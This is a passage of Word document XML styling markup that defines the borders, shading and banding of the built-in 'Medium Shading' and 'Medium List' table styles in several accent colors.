    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="F2E3D7" w:themeFill="accent2" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="175">
    <w:name w:val="Medium Shading 1 Accent 3"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="63"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tbl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single" w:color="9E8E84" w:themeColor="accent3"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nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="7A6A60" w:themeFill="accent3"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="9E8E84" w:themeColor="accent3" w:themeTint="BF" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="9E8E84" w:themeColor="accent3" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="9E8E84" w:themeColor="accent3" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="9E8E84" w:themeColor="accent3"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DFD9D6" w:themeFill="accent3" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="DFD9D6" w:themeFill="accent3" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="176">
    <w:name w:val="Medium Shading 1 Accent 4"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="63"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:insideH w:val="single" w:color="C6AE91" w:themeColor="accent4"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C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:left w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="B4936D" w:themeFill="accent4"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="C6AE91" w:themeColor="accent4" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="C6AE91" w:themeColor="accent4"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ECE4DA" w:themeFill="accent4" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="ECE4DA" w:themeFill="accent4" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="177">
    <w:name w:val="Medium Shading 1 Accent 5"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="63"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tbl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single" w:color="8B9B9E" w:themeColor="accent5"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nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="67787B" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="8B9B9E" w:themeColor="accent5" w:themeTint="BF" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="8B9B9E" w:themeColor="accent5" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="8B9B9E" w:themeColor="accent5" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="8B9B9E" w:themeColor="accent5"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D8DEDF" w:themeFill="accent5" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D8DEDF" w:themeFill="accent5" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="178">
    <w:name w:val="Medium Shading 1 Accent 6"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="63"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tbl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single" w:color="B5AE93" w:themeColor="accent6"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nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="9D936F" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="B5AE93" w:themeColor="accent6" w:themeTint="BF" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="B5AE93" w:themeColor="accent6" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="B5AE93" w:themeColor="accent6" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="B5AE93" w:themeColor="accent6"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E6E4DB" w:themeFill="accent6" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E4DB" w:themeFill="accent6" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="179">
    <w:name w:val="Medium Shading 2"/>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000000" w:themeFill="text1"/>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0">
    <w:name w:val="Medium Shading 2 Accent 1"/>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7E97AD" w:themeFill="accent1"/>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7E97AD" w:themeFill="accent1"/>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7E97AD" w:themeFill="accent1"/>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1">
    <w:name w:val="Medium Shading 2 Accent 2"/>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CC8E60" w:themeFill="accent2"/>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CC8E60" w:themeFill="accent2"/>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CC8E60" w:themeFill="accent2"/>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2">
    <w:name w:val="Medium Shading 2 Accent 3"/>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7A6A60" w:themeFill="accent3"/>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7A6A60" w:themeFill="accent3"/>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7A6A60" w:themeFill="accent3"/>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3">
    <w:name w:val="Medium Shading 2 Accent 4"/>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B4936D" w:themeFill="accent4"/>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B4936D" w:themeFill="accent4"/>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B4936D" w:themeFill="accent4"/>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4">
    <w:name w:val="Medium Shading 2 Accent 5"/>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67787B" w:themeFill="accent5"/>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67787B" w:themeFill="accent5"/>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67787B" w:themeFill="accent5"/>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5">
    <w:name w:val="Medium Shading 2 Accent 6"/>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9D936F" w:themeFill="accent6"/>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9D936F" w:themeFill="accent6"/>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9D936F" w:themeFill="accent6"/>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6">
    <w:name w:val="Medium List 1"/>
    <w:basedOn w:val="106"/>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000000" w:themeColor="text1" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F2123" w:themeColor="text2"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx2"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>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blLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:themeColor="text1" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="text1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="text1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="187">
    <w:name w:val="Medium List 1 Accent 1"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="65"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1"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7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F2123" w:themeColor="text2"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx2"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DFE5EA" w:themeFill="accent1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DFE5EA" w:themeFill="accent1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="188">
    <w:name w:val="Medium List 1 Accent 2"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="65"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="CC8E60" w:themeColor="accent2"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CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F2123" w:themeColor="text2"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx2"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2E3D7" w:themeFill="accent2" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2E3D7" w:themeFill="accent2" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="189">
    <w:name w:val="Medium List 1 Accent 3"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="65"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="7A6A60" w:themeColor="accent3"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7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F2123" w:themeColor="text2"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx2"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DFD9D6" w:themeFill="accent3" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DFD9D6" w:themeFill="accent3" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="190">
    <w:name w:val="Medium List 1 Accent 4"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="65"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4"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B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F2123" w:themeColor="text2"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx2"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="ECE4DA" w:themeFill="accent4" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="ECE4DA" w:themeFill="accent4" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="191">
    <w:name w:val="Medium List 1 Accent 5"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="65"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="67787B" w:themeColor="accent5"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67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F2123" w:themeColor="text2"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx2"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D8DEDF" w:themeFill="accent5" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D8DEDF" w:themeFill="accent5" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="192">
    <w:name w:val="Medium List 1 Accent 6"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="65"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="9D936F" w:themeColor="accent6"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9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F2123" w:themeColor="text2"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx2"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E4DB" w:themeFill="accent6" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E4DB" w:themeFill="accent6" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="193">
    <w:name w:val="Medium List 2"/>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blLayout w:type="fixed"/>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blLayout w:type="fixed"/>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BFBFBF" w:themeFill="text1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
